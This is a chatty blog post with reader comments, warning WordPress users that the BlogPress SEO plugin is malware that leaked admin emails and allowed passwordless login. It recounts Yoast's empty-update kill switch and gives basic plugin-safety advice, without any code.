Is That WordPress Plugin Update Really MALWARE Instead? How to check.
Is That WordPress Plugin Update Really MALWARE Instead? How to check.
Nov 14
Morning!
Today is wondrous Sunday! The day I was supposed to (get this, I hope you're sitting down) "rest" (OMG!) and "take a break" (Jeepers, say it ain't so!).
And I was, honestly and truly.
I really was!
Until….
Until I read this chilling post, and realized – I simply *have* to alert my readers.
Now, Yoast is beyond brilliant when it comes to WordPress; his blog is something you simply must follow (you can subscribe by email here or grab his RSS feed here).
Anywhos, there I was, blissfully consuming my 34th cup of coffee, wrapped up in my nice fluffy blue 21 year old house coat (funny how you just cannot get rid of down-home comforts, eh?) and simply enjoying my 4am.
I'll bet you're familiar with my state of being, right?
After all, imagine that you had just awakened, your family was still happily asleep so you could (sit down again, another impossible scenario is steamrolling to you this instant) get some work done, and you fire up your feedreader.
Figuring that you'd start checking out what your peers were writing, you calmly scroll through your entries and then you read…..THIS.
…I thought BlogPress SEO was bad, turns out, it's worse. It's malware. I had already discovered that it sent the admin email to the plugin's author, but today, mtekk uncovered that it was adding an option to log in, solely with that email address. Yes that's bad. I checked out the plugin code again, and noticed something that could solve all this….MORE….
Now, I don't know about you, but put the words:
- malware
and
- admin email
and
- wordpress plugin
all together, and you've concocted a sure-fire recipe for me to leap up in a state of extreme agitation (without spilling a drop of coffee, mind you, I'm not that hopeless) and shriek to the monitor:
"Jeepers self, shall I covertly panic now or in 2 seconds?"
Luckily sanity did prevail (raising a passel of kids and mooses and Twitter Budgies does that for me) and I continued reading.
Here's what happened.
1.) A WordPress plugin was created on a site that promised:
We have developed a superb wordpress plugin which can actually get 100's of backlinks like crazy, all on autopilot. As soon as you install the plugin, the plugin will find all relevant blogs in the network which are similar to your niche. So if you write about dogs then the plugin will find all blogs which talk about dogs. Once the plugin find the relevant blogs, it will mutually exchange links between the blogs. So if you have 300 posts in your blog then it will find 300 similar posts in the network, and in turn mutually links with those posts. So you will get around 300 backlinks right away. The more you write the more backlinks will be found by the plugin for your posts. This is a ongoing process and I can assure you that you will see gradual increase in traffic over time. ….MORE…..
2.) The download was from the original site, NOT the WordPress plugin repository.
In other words, that made sure no security checks were possible.
Can you say," Danger Will Robinson?"
3.) The BlogPress SEO plugin was written to steal your admin login info AND make it possible to login to your WordPress blog without a password.
To quote Yoast :
Update: It get's worse. As pointed out by this post, BlogPress SEO is pure malware, as it contains a function that allows someone who knows your admin email address (you know, the one they just sent to themselves when you installed the plugin) to log in without a password… That's purely criminal.
That post was written by mtekkmonkey, that blog can be found over at M'tekk's Crib and the feed is here (definitely add!).
So I'll bet you're wondering just what mistake the plugin author made?
You'll love this:
4.) The BlogPress SEO WordPress plugin author wrote to BOTH Yoast AND mtekkmonkey and asked for a review.
Un.
Be!
Lievable!
Wow wow wow wow.
But here's a quick fix Yoast inflicted on that malware BlogPress WordPress Plugin!
This is sheer brilliance.
…With permission, he made a blank plugin by the same name over at the WordPress Repository that simply had a higher version number.
To wit:
With the help of Andrew Nacin, I registered blogpressseo as a plugin on WordPress.org, created an empty plugin file with the same name and a higher version number, added a readme.txt with an upgrade notice, and uploaded it to WordPress.org….
I had already installed the plugin on my blog (well, an empty version of it, just the headers), so I could test it, and low and behold, it worked…
It's a primitive form of a kill switch (which I wish WordPress had, but it's better than nothing). The funny thing is: we'll now also be able to see how many people are running this plugin and how many of them upgrade. So far, 26 people have been saved!…MORE….
Wasn't that smart of him?
Which brings me now to:
What *you*, gentle reader, need to do *now*
If you've installed the Blogpress SEO plugin, *uninstall* it now.
Change your admin password.
And tell all of your network about this problem (feel free to point them to this site if needed).
In closing
When finding a nifty-neato WordPress plugin, you need to search for it FIRST on Google like so:
- (plugin name) malware (ie "blogpress seo" malware)
- (plugin name) spyware (ie "blogpress seo" spyware)
- (plugin name) help (ie "blogpress seo" help)
to see if anyone has experienced any problems already.
Remember…
An educated blogger is always the best kind of blogger!
And one last thing:
Ideally, always and only download WordPress plugins from the official WordPress Plugin Repository.
While it's still no absolute guarantee of safety, it's as near as that as you can get.
Want more information? Check out:
- BlogPress SEO plugin isn’t just bad, it’s malware
- BlogPress SEO is Malware
- BlogPress SEO Plugin: Spam!
- BlogPress SEO Plugin: Spam, Spam, Spam!
- Don’t use BlogPress SEO. Ever.
- Malware Warning > BlogPress SEO Plugin
- WARNING: Don’t USE BlogPress SEO Plugin On WordPress, It’s A Scam and Trojan
Hope you found this article useful! It sure caught my attention, indeed.
Grow strong,
Barbara Ling
About the author
"Hey there, thanks so much for stopping by! If you
enjoyed this article, please do feel free to tell your
friends about it or use those nifty neato social icons
above to spread the word. I love sharing great info,
and would really appreciate it...thanks!"
-- Barbara Ling
Thank you, Barbara! I was just about to have my first cup of coffee when this popped up on TweetDeck.
The nerve of some people, right?
This sounds suspiciously like another plugin I "heard" about. I don't want to be sued for defamation of code, so I will just take your advice and do my due diligence.
Enjoy the day!
Cheers,Mitch
Gosh yes Mitch, some people are just plain icky.
Have a wondrous Sunday!
Wow Barbara
There are definite advantages to not being a techie lol For one, I don't upgrade anything without checking with my techie frineds. Glad you are alerting everyone. thanks Barbara.
Patricia Perth Australia
My pleasure Patricia! Pls help spread the word, the more folks who know about this, the better. Thanks!
Thanks a lot for this advice. I am now, since about a week ago, a member of Scribe SEO (from the people behind Copyblogger). It's awesome, and I'm very satisfied with the results.
Neat stuff! I’ll check it out Jens, thanks!
So far I've restrained myself to downloading and installing plugins ONLY through the built-in WordPress utility. (and done enough damage just whith those!) Boy am I glad I didn't run into THAT one. Thanks for the heads-up… I'm off to paint this warning in my barn.
Please send me a picture of your barn door when you're done, Allen!
The plugin is in its early stages but has been tested thoroughly on a number of blogs. It may not work on all blogs especially those that use complex themes and javascript implementations. Plugins can extend WordPress to do almost anything you can imagine. In the directory you can find, download, rate, and comment on all the best plugins the WordPress community has to offer. Plugins offer custom functions and features so that each user can tailor their site to their specific needs.
Beautiful comment – amazing that the same comment is on 38 thousand other sites.
I’ve removed your site and such from your comment – I welcome your input but not solely to get your link on my site. Please come back and become a valued member of the community instead, okay? I’m happy to have your Beagle training link in that case. Thanks!
You certainly know how to wake up a sleepy Wednesday afternoon here in New Zealand! Nearly fell off my chair!
Thank goodness I hadn't used that plugin but it does open up the whole "how safe are these dern things" question. It's easy to think that each shiny new plugin should be greeted with glee and promptly installed. I'd never considered that perhaps I should be doing due diligence on them first.
Thanks for the heads-up.
Happy to be of service, Dawn!